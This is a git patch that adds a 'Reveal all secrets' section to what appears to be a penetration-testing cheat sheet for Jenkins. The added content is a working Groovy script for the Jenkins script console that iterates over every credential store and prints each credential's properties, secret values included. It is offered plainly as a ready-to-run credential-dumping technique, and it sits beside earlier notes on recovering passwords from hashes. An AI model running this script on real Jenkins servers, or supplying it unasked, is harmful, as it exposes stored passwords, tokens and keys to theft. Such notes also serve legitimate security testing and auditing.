From 977b79f8f4c41e3c8b1747074ef630729e8f752a Mon Sep 17 00:00:00 2001
From: Morgan <wattiez.morgan@gmail.com>
Date: Wed, 12 Feb 2020 22:26:47 +0100
Subject: [PATCH] reveal all jenkins secrets

---
 cheat/jenkins.md | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)

diff --git a/cheat/jenkins.md b/cheat/jenkins.md
index 73a35be..f763823 100644
--- a/cheat/jenkins.md
+++ b/cheat/jenkins.md
@@ -7,3 +7,35 @@ Execute in https://*INSTANCE*/script to reveal passwords from a password hash (o
 ### Jenkins current jobs
 
 https://*INSTANCE*/computer/api/json?tree=computer[executors[currentExecutable[*]]]
+
+### Reveal all secrets
+
+Execute in https://*INSTANCE*/script to reveal all secrets
+```
+import com.cloudbees.plugins.credentials.CredentialsProvider
+import com.cloudbees.plugins.credentials.Credentials
+import com.cloudbees.plugins.credentials.domains.Domain
+import jenkins.model.Jenkins
+def indent = { String text, int indentationCount ->
+  def replacement = "\t" * indentationCount
+  text.replaceAll("(?m)^", replacement)
+}
+Jenkins.get().allItems().collectMany{ CredentialsProvider.lookupStores(it).toList()}.unique().forEach { store ->
+  Map<Domain, List<Credentials>> domainCreds = [:]
+  store.domains.each { domainCreds.put(it, store.getCredentials(it))}
+  if (domainCreds.collectMany{ it.value}.empty) {
+    return
+  }
+  def shortenedClassName = store.getClass().name.substring(store.getClass().name.lastIndexOf(".") + 1)
+  println "Credentials for store context: ${store.contextDisplayName}, of type $shortenedClassName"
+  domainCreds.forEach { domain , creds ->
+    println indent("Domain: ${domain.name}", 1)
+    creds.each { cred ->
+      cred.properties.each { prop, val ->
+        println indent("$prop = \"$val\"", 2)
+      }
+      println indent("-----------------------", 2)
+    }
+  }
+}
+```